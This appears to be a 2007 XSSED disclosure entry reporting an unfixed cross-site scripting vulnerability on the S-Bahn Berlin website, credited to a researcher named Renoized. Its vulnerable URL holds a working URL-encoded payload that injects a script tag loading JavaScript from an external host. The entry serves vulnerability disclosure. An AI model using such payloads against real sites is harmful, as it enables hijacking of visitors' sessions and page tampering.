Unfixed XSS vulnerability at www.s-bahn-berlin.de

2007-03-10T00:00:00
ID: XSSED:21468
Type: xssed
Reporter: Renoized
Modified: 2007-03-10T00:00:00

Description

On 03/10/2007, security researcher Renoized submitted a cross-site scripting (XSS) vulnerability affecting www.s-bahn-berlin.de, which at the time of submission ranked 142061 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 03/10/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.s-bahn-berlin.de/suche/index.php?cx=015723998419849412855:fqyojabclx0&q=\%22%3E%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E%20'S-Bahn%20Berlin%20GmbH'&cof=FORID:9&string=\%22%3E%3CSCRIPT%20SRC=http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E